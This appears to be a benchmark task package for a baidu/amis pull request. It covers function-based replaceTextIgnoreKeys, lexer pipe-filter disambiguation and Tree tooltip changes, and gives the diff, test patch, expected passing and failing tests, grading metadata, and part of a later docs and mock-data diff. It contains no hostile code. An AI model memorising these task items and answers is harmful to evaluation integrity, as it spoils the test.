diff --git a/docs/zh-CN/start/getting-started.md b/docs/zh-CN/start/getting-started.md index ff6b2ad74..9fac584e3 100644 --- a/docs/zh-CN/start/getting-started.md +++ b/docs/zh-CN/start/getting-started.md @@ -759,8 +759,7 @@ let amisScoped = amis.embed( { replaceText: { service: 'http://localhost' - }, - replaceTextKeys: ['api'] + } } ); ``` @@ -779,6 +778,29 @@ type, name, mode, target, reload 如果发现有字段被意外替换了,可以通过设置这个属性来避免 +通过字符串数组或者函数来过滤字段,比如: + +```javascript +let amisScoped = amis.embed( + '#root', + { + type: 'page', + body: { + type: 'service', + api: 'service/api' + } + }, + {}, + { + replaceText: { + service: 'http://localhost' + }, + // replaceTextIgnoreKeys: ['api'], + replaceTextIgnoreKeys: key => key === 'api' + } +); +``` + #### toastPosition Toast 提示弹出位置,默认为`'top-center'`。 diff --git a/packages/amis-core/package.json b/packages/amis-core/package.json index a5b5d4ca5..e8834b56e 100644 --- a/packages/amis-core/package.json +++ b/packages/amis-core/package.json @@ -61,7 +61,8 @@ "react-intersection-observer": "9.5.2", "react-json-view": "1.21.3", "tslib": "^2.3.1", - "uncontrollable": "7.2.1" + "uncontrollable": "7.2.1", + "path-to-regexp": "6.2.0" }, "peerDependencies": { "amis-formula": "*", diff --git a/packages/amis-core/src/env.tsx b/packages/amis-core/src/env.tsx index e63b9c289..830f41098 100644 --- a/packages/amis-core/src/env.tsx +++ b/packages/amis-core/src/env.tsx @@ -131,7 +131,9 @@ export interface RendererEnv { /** * 文本替换的黑名单,因为属性太多了所以改成黑名单的 flags */ - replaceTextIgnoreKeys?: String[]; + replaceTextIgnoreKeys?: + | String[] + | ((key: string, value: any, object: any) => boolean); /** * 解析url参数 diff --git a/packages/amis-core/src/utils/replaceText.ts b/packages/amis-core/src/utils/replaceText.ts index 42c3e6925..2b5c630c2 100644 --- a/packages/amis-core/src/utils/replaceText.ts +++ b/packages/amis-core/src/utils/replaceText.ts @@ -7,20 +7,31 @@ import {isObject, JSONTraverse} from './helper'; export function replaceText( schema: any, replaceText?: {[propName: string]: string}, - replaceTextIgnoreKeys?: String[] + replaceTextIgnoreKeys?: + | String[] + | ((key: string, value: any, object: any) => boolean) ) { // 进行文本替换 if (replaceText && isObject(replaceText)) { let replicaSchema = cloneDeep(schema); const replaceKeys = Object.keys(replaceText); replaceKeys.sort((a, b) => b.length - a.length); // 避免用户将短的放前面 - const IgnoreKeys = new Set(replaceTextIgnoreKeys || []); + const IgnoreKeys = new Set( + Array.isArray(replaceTextIgnoreKeys) ? replaceTextIgnoreKeys : [] + ); + const ignore = + typeof replaceTextIgnoreKeys === 'function' + ? replaceTextIgnoreKeys + : (key: string) => { + return IgnoreKeys.has(key); + }; + JSONTraverse(replicaSchema, (value: any, key: string, object: any) => { const descriptor = Object.getOwnPropertyDescriptor(object, key); if ( typeof value === 'string' && - !IgnoreKeys.has(key) && - descriptor?.writable + descriptor?.writable && + !ignore(key, value, object) ) { for (const replaceKey of replaceKeys) { if (~value.indexOf(replaceKey)) { diff --git a/packages/amis-formula/src/lexer.ts b/packages/amis-formula/src/lexer.ts index c48b878c4..18a5288ae 100644 --- a/packages/amis-formula/src/lexer.ts +++ b/packages/amis-formula/src/lexer.ts @@ -1,3 +1,4 @@ +import {getFilters} from './filter'; import {LexerOptions, Token, TokenTypeName} from './types'; export const enum TokenEnum { @@ -171,16 +172,25 @@ function formatNumber(value: string) { return Number(value); } -export function lexer(input: string, options?: LexerOptions) { +export function lexer(input: string, options: LexerOptions = {}) { let line = 1; let column = 1; let index = 0; let mainState = mainStates.START; const states: Array<any> = [mainState]; let tokenCache: Array<Token> = []; - const allowFilter = options?.allowFilter !== false; + options = {...options}; + const allowFilter = options.allowFilter !== false; - if (options?.evalMode || options?.variableMode) { + if (!options.isFilter) { + const filterKeys = Object.keys(getFilters()); + if ((options as any).filters) { + filterKeys.push(...Object.keys((options as any).filters)); + } + options.isFilter = (name: string) => filterKeys.includes(name); + } + + if (options.evalMode || options.variableMode) { pushState(mainStates.EXPRESSION); } @@ -370,6 +380,16 @@ export function lexer(input: string, options?: LexerOptions) { token.value === '|' && allowFilter ) { + // 怎么区分是过滤还是位运算呢? + // 靠外面反馈吧 + if (options?.isFilter) { + const restInput = input.substring(token.start.index + 1).trim(); + const m = /^[A-Za-z0-9_$@][A-Za-z0-9_\-$@]*/.exec(restInput); + if (!m || !options.isFilter(m[0])) { + return token; + } + } + pushState(mainStates.Filter); return { type: TokenName[TokenEnum.OpenFilter], diff --git a/packages/amis-formula/src/types.ts b/packages/amis-formula/src/types.ts index 39c967bff..a675707ff 100644 --- a/packages/amis-formula/src/types.ts +++ b/packages/amis-formula/src/types.ts @@ -61,6 +61,8 @@ export interface LexerOptions { * ${abc | html} */ allowFilter?: boolean; + + isFilter?: (name: string) => boolean; } export type TokenTypeName = diff --git a/packages/amis-ui/scss/components/form/_tree.scss b/packages/amis-ui/scss/components/form/_tree.scss index 397dc5d1e..7f6feee9f 100644 --- a/packages/amis-ui/scss/components/form/_tree.scss +++ b/packages/amis-ui/scss/components/form/_tree.scss @@ -199,6 +199,7 @@ height: var(--Tree-itemHeight); line-height: var(--Tree-itemHeight); padding-right: var(--Tree-icon-gap); + flex-shrink: 0; > a { display: inline-block; @@ -359,7 +360,6 @@ &-itemText { cursor: pointer; - flex: 1 auto; display: inline-block; color: var(--inputTree-base-default-color); font-size: var(--select-tree-fontSize); diff --git a/packages/amis-ui/src/components/Tree.tsx b/packages/amis-ui/src/components/Tree.tsx index 5766cbf71..047bf6c93 100644 --- a/packages/amis-ui/src/components/Tree.tsx +++ b/packages/amis-ui/src/components/Tree.tsx @@ -37,6 +37,7 @@ import {LocaleProps, localeable} from 'amis-core'; import Spinner, {SpinnerExtraProps} from './Spinner'; import {ItemRenderStates} from './Selection'; import VirtualList from './virtual-list'; +import TooltipWrapper from './TooltipWrapper'; interface IDropIndicator { left: number; @@ -1275,33 +1276,42 @@ export class TreeSelector extends React.Component< !(item.defer && !item.loaded) ? ( <div className={cx('Tree-item-icons')}> {creatable && hasAbility(item, 'creatable') ? ( - <a - onClick={this.handleAdd.bind(this, item)} - data-tooltip={__(createTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(createTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="plus" className="icon" /> - </a> + <a onClick={this.handleAdd.bind(this, item)}> + <Icon icon="plus" className="icon" /> + </a> + </TooltipWrapper> ) : null} {removable && hasAbility(item, 'removable') ? ( - <a - onClick={this.handleRemove.bind(this, item)} - data-tooltip={__(removeTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(removeTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="minus" className="icon" /> - </a> + <a onClick={this.handleRemove.bind(this, item)}> + <Icon icon="minus" className="icon" /> + </a> + </TooltipWrapper> ) : null} {editable && hasAbility(item, 'editable') ? ( - <a - onClick={this.handleEdit.bind(this, item)} - data-tooltip={__(editTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(editTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="new-edit" className="icon" /> - </a> + <a onClick={this.handleEdit.bind(this, item)}> + <Icon icon="new-edit" className="icon" /> + </a> + </TooltipWrapper> ) : null} </div> ) : null}
feat: env.replaceTextIgnoreKeys 支持函数 Close: #7035 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 55473df</samp> This pull request improves the `replaceText` feature and its documentation. It allows users to filter keys and values with a custom function, and updates the docs and types accordingly. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 55473df</samp> > _If you want to replace text with ease_ > _You can use the `replaceText` feature, please_ > _But if some keys you want to skip_ > _You can pass a function, not just a list_ > _To the option `replaceTextIgnoreKeys`_ ### Why Close: #7035 ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 55473df</samp> * Remove `replaceTextKeys` option from `replaceText` documentation ([link](https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-cecdf20aaa84e6464093def72aee232955ad9649b13e7187284dfb7176b3cdacL757-R757)) * Add example of using a function to filter keys for `replaceText` feature ([link](https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-cecdf20aaa84e6464093def72aee232955ad9649b13e7187284dfb7176b3cdacR776-R798)) * Update `RendererEnv` interface to accept a function for `replaceTextIgnoreKeys` option ([link](https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-62f2e14b837dfa7b7f5f94ee2a856825f211639ddf0f85d783c666dbcd7f8d0dL123-R123)) * Refactor `replaceText` function to use `ignore` function instead of a set of strings ([link](https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-53fb1a4945d62b6335fc247673d64a59fee08926d3470647d0695b8e66c0cef2L10-R10), [link](https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-53fb1a4945d62b6335fc247673d64a59fee08926d3470647d0695b8e66c0cef2L17-R32))
**Title** Enhance replaceText ignore‑keys flexibility, refine formula lexer filtering, and unify Tree tooltip handling **Problem** `replaceText` could only skip keys via a static string list, limiting dynamic scenarios. The documentation did not reflect newer usage. Additionally, the formula lexer could not reliably differentiate filter syntax, and the Tree component relied on legacy tooltip attributes and had a layout issue. **Root Cause** The ignore‑keys logic was hard‑coded to a Set of strings, and the lexer lacked a customizable filter predicate. The Tree UI used raw data‑tooltip attributes and an unnecessary flex rule, leading to inconsistent tooltips and layout quirks. **Fix / Expected Behavior** - `replaceTextIgnoreKeys` now accepts either a string array or a predicate function that determines at runtime which keys to ignore. - Existing array‑based usage remains fully functional. - Documentation and type definitions are updated to show and type the new function option with an example. - The lexer options gain an `isFilter` callback, allowing precise identification of filter expressions while preserving current parsing behavior. - Tree action icons (`add`, `remove`, `edit`) are wrapped with the shared `TooltipWrapper` component, providing consistent hover tooltips. - Tree item styling is corrected: the icon container is prevented from shrinking, and the unnecessary flex rule on item text is removed. **Risk & Validation** - Run the full test suite and specifically verify that schemas using array‑based `replaceTextIgnoreKeys` continue to produce correct replacements. - Add/execute lexer tests to confirm filter parsing is unchanged when `isFilter` is omitted and works as intended when supplied. - Perform visual regression testing on the Tree component to ensure tooltips appear correctly and layout remains stable.
8,510
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index fb30171c4..32d23b1e5 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -580,3 +580,9 @@ test('evalute:namespace', () => { expect(evaluate('${ls: &["c"]["c"]}', {})).toMatchObject({d: 4}); expect(evaluate('${ls: &["c"][key]}', {})).toMatchObject({d: 4}); }); + +test('evalute:speical characters', () => { + // 优先识别成位运算,而不是过滤器 + expect(evaluate('${1 | 2}', {})).toBe(3); + expect(evaluate('${1 | abc}', {abc: 2})).toBe(3); +}); diff --git a/packages/amis-formula/__tests__/lexer.test.ts b/packages/amis-formula/__tests__/lexer.test.ts index 773032b1d..e431f3d24 100644 --- a/packages/amis-formula/__tests__/lexer.test.ts +++ b/packages/amis-formula/__tests__/lexer.test.ts @@ -31,13 +31,19 @@ test('lexer:simple', () => { test('lexer:filter', () => { expect( getTokens('\\$abc is ${abc | date: YYYY-MM-DD HH\\:mm\\:ss}', { - evalMode: false + evalMode: false, + filters: { + date() {} + } }) ).toMatchSnapshot(); expect( getTokens('\\$abc is ${abc | isTrue : trueValue : falseValue}', { - evalMode: false + evalMode: false, + filters: { + isTrue() {} + } }) ).toMatchSnapshot(); }); @@ -55,7 +61,10 @@ test('lexer:exception', () => { expect(() => getTokens('${a | filter: \\x2}', { - evalMode: false + evalMode: false, + filters: { + filter() {} + } }) ).toThrow('Unexpected token x in 1:17'); }); diff --git a/packages/amis-formula/__tests__/parser.test.ts b/packages/amis-formula/__tests__/parser.test.ts index fa87d1fbb..4c618fa1f 100644 --- a/packages/amis-formula/__tests__/parser.test.ts +++ b/packages/amis-formula/__tests__/parser.test.ts @@ -1,3 +1,4 @@ +import moment from 'moment'; import {parse} from '../src/index'; test('parser:simple', () => { @@ -120,8 +121,12 @@ test('parser:filter', () => { test('parser:filter-escape', () => { expect( parse('\\$abc is ${abc | date: YYYY-MM-DD HH\\:mm\\:ss}', { - evalMode: false - }) + evalMode: false, + filters: { + date: (input: any, format = 'LLL', inputFormat = 'X') => + moment(input, inputFormat).format(format) + } + } as any) ).toMatchSnapshot(); }); diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap index d87b14148..84cec19c7 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap @@ -2061,10 +2061,7 @@ exports[`Renderer:transfer follow left mode 1`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2100,10 +2097,7 @@ exports[`Renderer:transfer follow left mode 1`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2725,10 +2719,7 @@ exports[`Renderer:transfer follow left mode 2`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2764,10 +2755,7 @@ exports[`Renderer:transfer follow left mode 2`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus"
[ "evalute:speical characters" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "async-evalute:namespace", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction", "evalute:keywords", "evalute:Math", "evalute:namespace" ]
Method: lexer(input: string, options: LexerOptions = {}) Location: packages/amis-formula/src/lexer.ts Inputs: - **input**: the formula string to be tokenised. - **options** (optional): an object of type `LexerOptions` that may contain * `evalMode?: boolean` – treat the input as an expression. * `variableMode?: boolean` – treat the input as a variable reference. * `allowFilter?: boolean` – when `false` disables the `|` filter operator (defaults to `true`). * `filters?: Record<string, Function>` – a map of custom filter implementations; their names are added to the internal filter list. * `isFilter?: (name: string) => boolean` – custom predicate to decide whether an identifier after `|` is a filter; if omitted, the lexer builds a predicate from the built‑in filters plus any user‑provided `filters`. Outputs: `Token[]` – an ordered list of lexical tokens. The token stream respects the new `isFilter` logic, so a `|` token is returned as a bitwise‑OR operator when the following identifier is not recognised as a filter. Description: Lexes a formula expression into tokens with extended configurability. The function now always receives an options object (defaulted to `{}`), automatically builds a filter‑recognition predicate from built‑in and user‑supplied filters, and allows callers to supply a custom `isFilter` callback to disambiguate the pipe character (`|`) between filter syntax and bitwise‑or operations. Interface: LexerOptions Location: packages/amis-formula/src/types.ts Inputs: - `allowFilter?: boolean` – keep existing behaviour. - `isFilter?: (name: string) => boolean` – **new** optional property allowing callers to provide a custom function that determines whether a token name after a pipe (`|`) should be treated as a filter. Outputs: none (type definition). Description: Configuration object passed to `lexer`. The addition of `isFilter` enables callers (e.g., tests) to control filter detection when the lexer processes the `|` operator, which is required for the new test cases that verify correct handling of special characters.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 8, "num_modified_lines": 98, "pr_author": "2betop", "pr_labels": [ "feat" ], "llm_metadata": { "code": "B5", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": true, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-cecdf20aaa84e6464093def72aee232955ad9649b13e7187284dfb7176b3cdacL757-R757", "https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-cecdf20aaa84e6464093def72aee232955ad9649b13e7187284dfb7176b3cdacR776-R798", "https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-62f2e14b837dfa7b7f5f94ee2a856825f211639ddf0f85d783c666dbcd7f8d0dL123-R123", "https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-53fb1a4945d62b6335fc247673d64a59fee08926d3470647d0695b8e66c0cef2L10-R10", "https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-53fb1a4945d62b6335fc247673d64a59fee08926d3470647d0695b8e66c0cef2L17-R32" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat", "documentation_enh" ], "reason": null, "reasoning": "The issue requests adding function support to replaceTextIgnoreKeys and updating docs. The provided test patch, however, adds many unrelated changes (formula lexer/filter handling, UI tooltip attribute removal, parser imports) that are not described in the issue, indicating missing acceptance criteria and extraneous patch artifacts. These misalignments point to an environment preparation problem rather than a clean, solvable task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "evaluate test adds special character handling not mentioned in the issue", "lexer test modifies filter options and adds isFilter logic unrelated to replaceTextIgnoreKeys", "parser test imports moment and adds filter handling not described", "UI snapshot changes remove data‑tooltip attributes, which are unrelated to the feature" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
1bb988b942739d3f674260f578a69be4dfe659b9
2023-10-26 11:26:59
baidu__amis-8515
diff --git a/docs/zh-CN/components/crud.md b/docs/zh-CN/components/crud.md index d6b2561da..b6ab5a436 100755 --- a/docs/zh-CN/components/crud.md +++ b/docs/zh-CN/components/crud.md @@ -200,11 +200,11 @@ CRUD 组件对数据源接口的数据结构要求如下: | orderDir | 'asc'/'desc' | 排序方式 | | keywords | string | 搜索关键字 | -### 解析Query原始类型 +### 解析 Query 原始类型 > `3.5.0`及以上版本 -`syncLocation`开启后,CRUD在初始化数据域时,将会对url中的Query进行转换,将原始类型的字符串格式的转化为同位类型,目前仅支持**布尔类型** +`syncLocation`开启后,CRUD 在初始化数据域时,将会对 url 中的 Query 进行转换,将原始类型的字符串格式的转化为同位类型,目前仅支持**布尔类型** ``` "true" ==> true @@ -213,7 +213,6 @@ CRUD 组件对数据源接口的数据结构要求如下: 如果只想保持字符串格式,可以设置`"parsePrimitiveQuery": false`关闭该特性,具体效果参考[示例](../../../examples/crud/parse-primitive-query)。 - ## 功能 既然这个渲染器叫增删改查,那接下来分开介绍这几个功能吧。 @@ -584,6 +583,61 @@ Cards 模式支持 [Cards](./cards) 中的所有功能。 } ``` +## 嵌套 + +当行数据中存在 `children` 字段时,CRUD 会自动识别为树形数据,并支持展开收起。 + +```schema: scope="body" +{ + "type": "crud", + "name": "crud", + "syncLocation": false, + "api": "/api/mock2/crud/table2", + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "engine", + "label": "Rendering engine" + }, + { + "name": "browser", + "label": "Browser" + } + ] +} +``` + +## 嵌套懒加载 + +如果数据量比较大不适合一次性加载,可以配置 `deferApi` 接口,结合行数据中标记 `defer: true` 属性,实现懒加载。 + +```schema: scope="body" +{ + "type": "crud", + "name": "crud", + "syncLocation": false, + "api": "/api/mock2/crud/table6", + "deferApi": "/api/mock2/crud/table6?parentId=${id}", + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "engine", + "label": "Rendering engine" + }, + { + "name": "browser", + "label": "Browser" + } + ] +} +``` + ## 查询条件表单 大部分表格展示有对数据进行检索的需求,CRUD 自身支持通过配置`filter`,实现查询条件过滤表单。`filter` 配置实际上同 [Form](./form/index) 组件,因此支持绝大部分`form`的功能。 @@ -3173,6 +3227,7 @@ itemAction 里的 onClick 还能通过 `data` 参数拿到当前行的数据, | title | `string` | `""` | 可设置成空,当设置成空时,没有标题栏 | | className | `string` | | 表格外层 Dom 的类名 | | api | [API](../../docs/types/api) | | CRUD 用来获取列表数据的 api。 | +| deferApi | [API](../../docs/types/api) | | 当行数据中有 defer 属性时,用此接口进一步加载内容 | | loadDataOnce | `boolean` | | 是否一次性加载所有数据(前端分页) | | loadDataOnceFetchOnFilter | `boolean` | `true` | 在开启 loadDataOnce 时,filter 时是否去重新请求 api | | source | `string` | | 数据映射接口返回某字段的值,不设置会默认使用接口返回的`${items}`或者`${rows}`,也可以设置成上层数据源的内容 | diff --git a/docs/zh-CN/components/table.md b/docs/zh-CN/components/table.md index 0efccd914..1667515df 100755 --- a/docs/zh-CN/components/table.md +++ b/docs/zh-CN/components/table.md @@ -1825,6 +1825,7 @@ popOver 的其它配置请参考 [popover](./popover) | type | `string` | | `"type"` 指定为 table 渲染器 | | | title | `string` | | 标题 | | | source | `string` | `${items}` | 数据源, 绑定当前环境变量 | | +| deferApi | [API](../../docs/types/api) | | 当行数据中有 defer 属性时,用此接口进一步加载内容 | | affixHeader | `boolean` | `true` | 是否固定表头 | | | columnsTogglable | `auto` 或者 `boolean` | `auto` | 展示列显示开关, 自动即:列数量大于或等于 5 个时自动开启 | | | placeholder | `string` 或者 `SchemaTpl` | `暂无数据` | 当没数据的时候的文字提示 | | diff --git a/docs/zh-CN/start/getting-started.md b/docs/zh-CN/start/getting-started.md index 6d5d21414..9fac584e3 100644 --- a/docs/zh-CN/start/getting-started.md +++ b/docs/zh-CN/start/getting-started.md @@ -157,6 +157,7 @@ let amisScoped = amis.embed( // requestAdaptor(api) { // // 支持异步,可以通过 api.mockResponse 来设置返回结果,跳过真正的请求发送 // // 此功能自定义 fetcher 的话会失效 + // // api.context 中包含发送请求前的上下文信息 // return api; // } // @@ -758,8 +759,7 @@ let amisScoped = amis.embed( { replaceText: { service: 'http://localhost' - }, - replaceTextKeys: ['api'] + } } ); ``` @@ -778,6 +778,29 @@ type, name, mode, target, reload 如果发现有字段被意外替换了,可以通过设置这个属性来避免 +通过字符串数组或者函数来过滤字段,比如: + +```javascript +let amisScoped = amis.embed( + '#root', + { + type: 'page', + body: { + type: 'service', + api: 'service/api' + } + }, + {}, + { + replaceText: { + service: 'http://localhost' + }, + // replaceTextIgnoreKeys: ['api'], + replaceTextIgnoreKeys: key => key === 'api' + } +); +``` + #### toastPosition Toast 提示弹出位置,默认为`'top-center'`。 diff --git a/docs/zh-CN/types/api.md b/docs/zh-CN/types/api.md index de89f2ecf..e806d3fa8 100755 --- a/docs/zh-CN/types/api.md +++ b/docs/zh-CN/types/api.md @@ -591,6 +591,7 @@ amis 的 API 配置,如果无法配置出你想要的请求结构,那么可 - method:当前请求的方式 - data:请求的数据体 - headers:请求的头部信息 + - context: 发送请求时的上下文数据 - **context** 发送请求时的上下文数据 ##### 字符串形式 diff --git a/examples/components/CRUD/Nested.jsx b/examples/components/CRUD/Nested.jsx index 3cbbb96c1..83f40fdf2 100644 --- a/examples/components/CRUD/Nested.jsx +++ b/examples/components/CRUD/Nested.jsx @@ -2,11 +2,9 @@ export default { title: '支持多层嵌套,列数据中有 children 字段即可。(建议不超过10层)', body: { type: 'crud', - api: '/api/mock2/crud/table2', + api: '/api/mock2/crud/table6', + deferApi: '/api/mock2/crud/table6?parentId=${id}', saveOrderApi: '/api/mock2/form/saveData', - expandConfig: { - expand: 'all' - }, draggable: true, columns: [ { diff --git a/mock/cfc/mock/crud/table6.js b/mock/cfc/mock/crud/table6.js new file mode 100644 index 000000000..ed198eddf --- /dev/null +++ b/mock/cfc/mock/crud/table6.js @@ -0,0 +1,527 @@ +function findInTree(tree, id) { + let ret = null; + tree.some(function (item) { + if (item.id == id) { + ret = item; + return true; + } + if (item.children) { + ret = findInTree(item.children, id); + return !!ret; + } + }); + return ret; +} + +module.exports = function (req, res) { + const perPage = 10; + const page = req.query.page || 1; + let items = data.concat(); + if (req.query.parentId) { + const item = findInTree(items, req.query.parentId); + + if (!item) { + res.json({ + status: 404, + msg: 'Not Found' + }); + return; + } + + res.json({ + status: 0, + msg: 'ok', + data: { + ...item, + children: Array.isArray(item.children) + ? item.children.map(item => ({ + ...item, + children: undefined, + defer: !!(Array.isArray(item.children) && item.children.length) + })) + : [] + } + }); + return; + } + const ret = { + status: 0, + msg: 'ok', + data: { + count: items.length, + rows: items + .concat() + .splice((page - 1) * perPage, perPage) + .map(item => ({ + ...item, + children: undefined, + defer: !!(Array.isArray(item.children) && item.children.length) + })) + } + }; + res.json(ret); +}; + +module.exports.cache = true; +const data = [ + { + engine: 'Trident', + browser: 'Internet Explorer 4.0', + platform: 'Win 95+', + version: '4', + grade: 'X' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '5', + grade: 'C' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 5.5', + platform: 'Win 95+', + version: '5.5', + grade: 'A' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 6', + platform: 'Win 98+', + version: '6', + grade: 'A' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 7', + platform: 'Win XP SP2+', + version: '7', + grade: 'A' + }, + { + engine: 'Trident', + browser: 'AOL browser (AOL desktop)', + platform: 'Win XP', + version: '6', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 1.0', + platform: 'Win 98+ / OSX.2+', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 1.5', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 2.0', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 3.0', + platform: 'Win 2k+ / OSX.3+', + version: '1.9', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Camino 1.0', + platform: 'OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Camino 1.5', + platform: 'OSX.3+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Netscape 7.2', + platform: 'Win 95+ / Mac OS 8.6-9.2', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Netscape Browser 8', + platform: 'Win 98SE+', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Netscape Navigator 9', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.0', + platform: 'Win 95+ / OSX.1+', + version: '1', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.1', + platform: 'Win 95+ / OSX.1+', + version: '1.1', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.2', + platform: 'Win 95+ / OSX.1+', + version: '1.2', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.3', + platform: 'Win 95+ / OSX.1+', + version: '1.3', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.4', + platform: 'Win 95+ / OSX.1+', + version: '1.4', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.5', + platform: 'Win 95+ / OSX.1+', + version: '1.5', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.6', + platform: 'Win 95+ / OSX.1+', + version: '1.6', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.7', + platform: 'Win 98+ / OSX.1+', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.8', + platform: 'Win 98+ / OSX.1+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Seamonkey 1.1', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Epiphany 2.20', + platform: 'Gnome', + version: '1.8', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 1.2', + platform: 'OSX.3', + version: '125.5', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 1.3', + platform: 'OSX.3', + version: '312.8', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 2.0', + platform: 'OSX.4+', + version: '419.3', + grade: 'A' + }, 